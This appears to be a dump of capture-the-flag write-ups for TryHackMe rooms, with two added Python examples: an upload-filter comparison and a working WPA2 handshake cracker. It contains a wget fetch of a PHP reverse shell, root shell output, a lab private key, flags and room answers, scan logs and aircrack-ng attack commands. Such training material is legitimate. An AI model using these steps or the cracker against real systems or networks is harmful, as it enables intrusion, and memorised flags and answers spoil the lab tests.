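The upload filter behaviour recorded in Vulnversity Task 4 above (`.php` rejected, `.phtml` accepted and executed) as an added example; this is not code from the room, from this repo or from the target box. It puts the kind of denylist the form behaved like next to an allowlist that would have stopped the webshell, and models which names the box's Apache would hand to PHP. `PHP_HANDLER` is an assumption reproducing the `FilesMatch` pattern in Ubuntu's stock php7 Apache module config; the file names are constructed.

```python
"""Extension denylist (bypassable) versus allowlist (not), plus a model of the
server-side handler mapping that made the room's .phtml upload execute.

Added example, not code from the Vulnversity room or this repo.
"""
import os
import re

# Assumption: Ubuntu's stock php7 Apache conf maps names matching this
# FilesMatch to the PHP engine. Check /etc/apache2/mods-enabled/php*.conf on
# your own box; older AddHandler-style configs also match inner extensions.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

IMAGE_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}
STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # one dotted component, no spaces


def upload_denylist(filename: str) -> bool:
    """Vulnerable: what the room's form behaved like. Only '.php' is refused,
    so 'shell.phtml' (same handler) walks straight through."""
    return not filename.lower().endswith(".php")


def would_execute(filename: str) -> bool:
    """Would the web server run this file as PHP?  Decided by the handler
    mapping above, not by anything the upload form thinks."""
    return PHP_HANDLER.search(os.path.basename(filename)) is not None


def upload_allowlist(filename: str) -> bool:
    """Hardened: accept only <safe-stem>.<image-suffix>.
    Rejects every PHP suffix, double extensions such as 'x.php.jpg'
    (defence in depth against AddHandler configs), spaces and path parts."""
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    return ext.lower() in IMAGE_SUFFIXES and STEM.fullmatch(stem) is not None


def review(filenames):
    """Per name: (denylist lets it through, allowlist lets it through,
    server would execute it as PHP)."""
    return {f: (upload_denylist(f), upload_allowlist(f), would_execute(f))
            for f in filenames}


if __name__ == "__main__":
    # Constructed names; the second and third are the room's blocked/allowed pair.
    for name, (deny, allow, runs) in review(
            ["avatar.png", "shell.php", "shell.phtml", "shell.php.jpg"]).items():
        print(f"{name:14} denylist={'pass' if deny else 'BLOCK':5} "
              f"allowlist={'pass' if allow else 'BLOCK':5} executes_as_php={runs}")
```

The point the table makes: the decision that matters is `would_execute`, which the upload form does not control. A filter that enumerates what to refuse has to know every suffix the handler config maps (`.phar` and `.phtml` here, more with other configs); one that enumerates what to accept does not. Storing uploads outside the document root, or under a directory with the PHP handler disabled, closes the gap even when the name check is wrong.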
===============================================================
2020/03/21 16:47:55 Finished
===============================================================
--------------------------------------------------------------------------------
/Vulnversity/php-reverse-shell.txt:
--------------------------------------------------------------------------------
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--------------------------------------------------------------------------------
/Vulnversity/root.txt:
--------------------------------------------------------------------------------
root@vulnuniversity:/root# ls
ls
root.txt
root@vulnuniversity:/root# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5
root@vulnuniversity:/root#
--------------------------------------------------------------------------------
/Vulnversity/shell.tar.xz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Vulnversity/shell.tar.xz
--------------------------------------------------------------------------------
/Vulnversity/suid.txt:
--------------------------------------------------------------------------------
./bin/su
./bin/ntfs-3g
./bin/mount
./bin/ping6
./bin/umount
./bin/systemctl
./bin/ping
./bin/fusermount
--------------------------------------------------------------------------------
/Vulnversity/user.txt:
--------------------------------------------------------------------------------
$ ls
bill
$ cd bill
$ ls
user.txt
$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb
--------------------------------------------------------------------------------
/Welcome To TryHackMe/README.md:
--------------------------------------------------------------------------------
# Welcome To TryHackMe | https://tryhackme.com/room/tutorial

### [Task 1] Structured Learning Through Tasks

#1 What protocol does the World Wide Web use? : `http`

#2 What port does HTTPS commonly run on? : `443`

--------------------------------------------------------------------------------
/WgelCTF/README.md:
--------------------------------------------------------------------------------
# Wgel CTF | https://tryhackme.com/room/wgelctf

### [Task 1] Wgel CTF

#1 User flag : 057c67131c3d5e42dd5cd3075b198ff6

#2 Root flag : b1b968b37519ad1daa6408188649263d

--------------------------------------------------------------------------------
/WgelCTF/gobuster_result.txt:
--------------------------------------------------------------------------------
gobuster dir -u 10.10.174.40 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.40
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/29 02:04:55 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)
===============================================================
2020/05/29 02:06:44 Finished
===============================================================
--------------------------------------------------------------------------------
/WgelCTF/gobuster_sitemap_result.txt:
--------------------------------------------------------------------------------
gobuster dir -u http://10.10.174.40/sitemap/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.40/sitemap/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/29 02:08:48 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.ssh (Status: 301)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
===============================================================
2020/05/29 02:10:39 Finished
===============================================================
--------------------------------------------------------------------------------
/WgelCTF/id_rsa:
--------------------------------------------------------------------------------
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2mujeBv3MEQFCel8yvjgDz066+8Gz0W72HJ5tvG8bj7Lz380
m+JYAquy30lSp5jH/bhcvYLsK+T9zEdzHmjKDtZN2cYgwHw0dDadSXWFf9W2gc3x
W69vjkHLJs+lQi0bEJvqpCZ1rFFSpV0OjVYRxQ4KfAawBsCG6lA7GO7vLZPRiKsP
y4lg2StXQYuZ0cUvx8UkhpgxWy/OO9ceMNondU61kyHafKobJP7Py5QnH7cP/psr
+J5M/fVBoKPcPXa71mA/ZUioimChBPV/i/0za0FzVuJZdnSPtS7LzPjYFqxnm/BH
Wo/Lmln4FLzLb1T31pOoTtTKuUQWxHf7cN8v6QIDAQABAoIBAFZDKpV2HgL+6iqG
/1U+Q2dhXFLv3PWhadXLKEzbXfsAbAfwCjwCgZXUb9mFoNI2Ic4PsPjbqyCO2LmE
AnAhHKQNeUOn3ymGJEU9iJMJigb5xZGwX0FBoUJCs9QJMBBZthWyLlJUKic7GvPa
M7QYKP51VCi1j3GrOd1ygFSRkP6jZpOpM33dG1/ubom7OWDZPDS9AjAOkYuJBobG
SUM+uxh7JJn8uM9J4NvQPkC10RIXFYECwNW+iHsB0CWlcF7CAZAbWLsJgd6TcGTv
2KBA6YcfGXN0b49CFOBMLBY/dcWpHu+d0KcruHTeTnM7aLdrexpiMJ3XHVQ4QRP2
p3xz9QECgYEA+VXndZU98FT+armRv8iwuCOAmN8p7tD1W9S2evJEA5uTCsDzmsDj
7pUO8zziTXgeDENrcz1uo0e3bL13MiZeFe9HQNMpVOX+vEaCZd6ZNFbJ4R889D7I
dcXDvkNRbw42ZWx8TawzwXFVhn8Rs9fMwPlbdVh9f9h7papfGN2FoeECgYEA4EIy
GW9eJnl0tzL31TpW2lnJ+KYCRIlucQUnBtQLWdTncUkm+LBS5Z6dGxEcwCrYY1fh
shl66KulTmE3G9nFPKezCwd7jFWmUUK0hX6Sog7VRQZw72cmp7lYb1KRQ9A0Nb97
uhgbVrK/Rm+uACIJ+YD57/ZuwuhnJPirXwdaXwkCgYBMkrxN2TK3f3LPFgST8K+N
LaIN0OOQ622e8TnFkmee8AV9lPp7eWfG2tJHk1gw0IXx4Da8oo466QiFBb74kN3u
QJkSaIdWAnh0G/dqD63fbBP95lkS7cEkokLWSNhWkffUuDeIpy0R6JuKfbXTFKBW
V35mEHIidDqtCyC/gzDKIQKBgDE+d+/b46nBK976oy9AY0gJRW+DTKYuI4FP51T5
hRCRzsyyios7dMiVPtxtsomEHwYZiybnr3SeFGuUr1w/Qq9iB8/ZMckMGbxoUGmr
9Jj/dtd0ZaI8XWGhMokncVyZwI044ftoRcCQ+a2G4oeG8ffG2ZtW2tWT4OpebIsu
eyq5AoGBANCkOaWnitoMTdWZ5d+WNNCqcztoNppuoMaG7L3smUSBz6k8J4p4yDPb
QNF1fedEOvsguMlpNgvcWVXGINgoOOUSJTxCRQFy/onH6X1T5OAAW6/UXc4S7Vsg
jL8g9yBg4vPB8dHC6JeJpFFE06vxQMFzn6vjEab9GhnpMihrSCod
-----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/WgelCTF/id_rsa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/id_rsa.png
--------------------------------------------------------------------------------
/WgelCTF/nmap_basic.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Fri May 29 02:03:43 2020 as: nmap -A -oN nmap_basic.nmap 10.10.174.40
Nmap scan report for 10.10.174.40
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/29%OT=22%CT=1%CU=41193%PV=Y%DS=2%DC=T%G=Y%TM=5ED0204
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1
OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   295.07 ms 10.9.0.1
2   295.26 ms 10.10.174.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 29 02:04:18 2020 -- 1 IP address (1 host up) scanned in 34.53 seconds

--------------------------------------------------------------------------------
/WgelCTF/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/root.png
--------------------------------------------------------------------------------
/WgelCTF/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/ssh.png
--------------------------------------------------------------------------------
/WgelCTF/ssh2john.txt:
--------------------------------------------------------------------------------
/usr/share/john/ssh2john.py id_rsa
id_rsa has no password!
--------------------------------------------------------------------------------
/WgelCTF/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/user.png
--------------------------------------------------------------------------------
/Wifi Hacking 101/Captures.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Wifi Hacking 101/Captures.tar.gz
--------------------------------------------------------------------------------
/Wifi Hacking 101/README.md:
--------------------------------------------------------------------------------
# Wifi Hacking 101 | https://tryhackme.com/room/wifihacking101

### [Task 1] The basics - An Intro to WPA

Key Terms :

● SSID: The network "name" that you see when you try to connect

● ESSID: An SSID that *may* apply to multiple access points, e.g. a company office, normally forming a bigger network. In Aircrack output it normally refers to the network you're attacking.

● BSSID: An access point's MAC (hardware) address

● WPA2-PSK: Wifi networks that you connect to by providing a password that's the same for everyone

● WPA2-EAP: Wifi networks that you authenticate to by providing a username and password, which are sent to a RADIUS server.

● RADIUS: A server for authenticating clients, not just for wifi.

The core of WPA(2) authentication is the 4-way handshake.

Most home WiFi networks, and many others, use WPA(2) Personal. If you have to log in with a password and it's not WEP, then it's WPA(2) Personal. WPA2-EAP uses RADIUS servers to authenticate, so if you have to enter a username and password in order to connect then it's probably that.

Previously, the WEP (Wired Equivalent Privacy) standard was used. This was shown to be insecure and can be broken by capturing enough packets to recover the key via statistical methods.

The 4-way handshake allows the client and the AP to both prove that they know the key without sending it to each other. WPA and WPA2 use practically the same authentication method, so the attacks on both are the same.

The keys for WPA are derived from both the ESSID and the password for the network. The ESSID acts somewhat like a salt in that it makes dictionary attacks more difficult: for a given password, the derived key still varies from one access point to another. Unless you precompute the dictionary for just that ESSID, you have to try passwords one at a time until you find the correct one.

Room Banner by Frank Wang on Unsplash

#1 What type of attack on the encryption can you perform on WPA(2) personal? : `brute force`

#2 Can this method be used to attack WPA2-EAP handshakes? (Yea/Nay) : `Nay`

#3 What three letter abbreviation is the technical term for the "wifi code"? : `psk`

#4 What's the minimum length of a WPA2 Personal password? : `8`

### [Task 2] You're being watched - Capturing packets to attack

Using the Aircrack-ng suite, we can start attacking a wifi network. This will walk you through attacking a network yourself, assuming you have a NIC that supports monitor mode.

The aircrack-ng suite consists of :

● aircrack-ng
● airdecap-ng
● airmon-ng
● aireplay-ng
● airodump-ng
● airtun-ng
● packetforge-ng
● airbase-ng
● airdecloak-ng
● airolib-ng
● airserv-ng
● buddy-ng
● ivstools
● easside-ng
● tkiptun-ng
● wesside-ng

We'll want to use aircrack-ng, airodump-ng and airmon-ng to attack WPA networks.

The aircrack tools come by default with Kali, or can be installed with a package manager or from https://www.aircrack-ng.org/

I suggest creating a hotspot on a phone/tablet, picking a weak password (from rockyou.txt) and following along with every stage. To generate 5 random passwords from rockyou, you can use this command on Kali: `head /usr/share/wordlists/rockyou.txt -n 10000 | shuf -n 5 -`

You will need a monitor mode NIC in order to capture the 4-way handshake. Many wireless cards support this, but it's important to note that not all of them do.

Packet injection support helps, as you can use it to deauth a client in order to force a reconnect, which makes the handshake happen again. Otherwise, you have to wait for a client to connect normally.

#1 How do you put the interface "wlan0" into monitor mode with Aircrack tools? (Full command) : `airmon-ng start wlan0`

#2 What is the new interface name likely to be after you enable monitor mode? : `wlan0mon`

#3 What do you do if other processes are currently trying to use that network adapter? : `airmon-ng check kill`

#4 What tool from the aircrack-ng suite is used to create a capture? : `airodump-ng`

#5 What flag do you use to set the BSSID to monitor? : `--bssid`

#6 And to set the channel? : `--channel`

#7 And how do you tell it to capture packets to a file? : `-w`

### [Task 3] Aircrack-ng - Let's Get Cracking

I will attach a capture for you to practice cracking on. If you are spending more than 3 mins cracking, something is likely wrong. (A single core VM on my laptop took around 1 min.)

In order to crack the password, we can either use aircrack itself or create a hashcat file in order to use GPU acceleration. There are two different versions of hashcat output file; most likely you want 3.6+ (hccapx) as that will work with recent versions of hashcat.

Useful Information :

BSSID: 02:1A:11:FF:D9:BD

ESSID: 'James Honor 8'

#1 What flag do we use to specify a BSSID to attack? : `-b`

#2 What flag do we use to specify a wordlist? : `-w`

#3 How do we create a HCCAPX in order to use hashcat to crack the password? : `-j`

#4 Using the rockyou wordlist, crack the password in the attached capture. What's the password? : `greeneggsandham`

`aircrack-ng -a2 --bssid 02:1A:11:FF:D9:BD -w /usr/share/wordlists/rockyou.txt NinjaJc01-01.cap`

#5 Where is password cracking likely to be fastest, CPU or GPU? : `GPU`

--------------------------------------------------------------------------------
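The key derivation the Task 1 paragraph describes (ESSID as the salt) and the per-candidate check that the Task 3 `aircrack-ng -a2` run performs, carried through as one added example in Python; it is not code from the room, from aircrack-ng or from this repo. The ESSID, BSSID and password are the room's. The client MAC, the two nonces and the EAPOL-Key frame are constructed here, so no capture file is parsed: the "capture" is built with the right password and then cracked from a small wordlist exactly the way a real one would be.

```python
"""WPA2-PSK handshake cracking in plain Python (added example, not the room's code).

Per wordlist candidate:
  PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32)        -- ESSID is the salt
  PTK = PRF-512(PMK, "Pairwise key expansion",
                min(AA,SPA)|max(AA,SPA)|min(ANonce,SNonce)|max(ANonce,SNonce))
  KCK = PTK[0:16]
  MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC field zeroed)[0:16]   (WPA2/CCMP)
The candidate is right when the recomputed MIC equals the one in the capture.
"""
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """The slow step (4096 PBKDF2 rounds); the ESSID salt is why rainbow tables
    only work per network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label|0x00|data|i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the four public handshake values (byte-wise min/max order)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # 802.1X header (4) + EAPOL-Key fields that precede the Key MIC (77)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 Key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck: bytes, replay_counter: int, snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with a valid MIC; field layout as on the wire."""
    body = (b"\x02"                                  # descriptor type: RSN
            + b"\x01\x0a"                            # key info: HMAC-SHA1 MIC, pairwise, MIC present
            + b"\x00\x10"                            # key length
            + replay_counter.to_bytes(8, "big")
            + snonce                                 # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, ID (unused in msg 2)
            + b"\x00" * 16                           # Key MIC placeholder
            + b"\x00\x00")                           # key data length (RSN IE omitted here)
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


ESSID = "James Honor 8"                    # from the room
AP_MAC = mac("02:1A:11:FF:D9:BD")          # from the room
CLIENT_MAC = mac("7a:3b:5c:12:34:56")      # constructed
ANONCE = bytes(range(32))                  # constructed, fixed so the run is reproducible
SNONCE = bytes(range(32, 64))              # constructed


def make_handshake(password: str) -> dict:
    """Stand-in for the four values airodump-ng would capture, plus message 2's bytes."""
    ptk = ptk_from_pmk(pmk_from_passphrase(password, ESSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {"essid": ESSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": build_msg2(ptk[:16], 1, SNONCE)}


SAMPLE_HANDSHAKE = make_handshake("greeneggsandham")   # the room's answer; constructed capture


def crack_handshake(hs: dict, wordlist) -> Optional[str]:
    """The aircrack-ng -a2 loop: one PBKDF2 per candidate, then a 16-byte MIC compare."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if not 8 <= len(candidate) <= 63:      # WPA2-PSK passphrase bounds; not worth a PBKDF2
            continue
        pmk = pmk_from_passphrase(candidate, hs["essid"])
        ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    print(crack_handshake(SAMPLE_HANDSHAKE, ["123456", "password", "greeneggsandham"]))
```

Running it prints `greeneggsandham`. Two things the code makes concrete that the prose only states: every candidate costs a full PBKDF2 (which is why the GPU answer to #5 holds, and why the 8..63 length filter matters: aircrack-ng likewise skips candidates outside that range), and nothing secret crosses the air, so the attacker needs only the two MACs, the two nonces and one MIC-bearing frame. Against a real capture, replace the constructed values with the AP/client addresses, the ANonce from message 1 and the SNonce plus the raw EAPOL bytes of message 2; the derivation and comparison do not change. Swap the ESSID and the PMK changes even for the same password, which is the "salt" effect from Task 1.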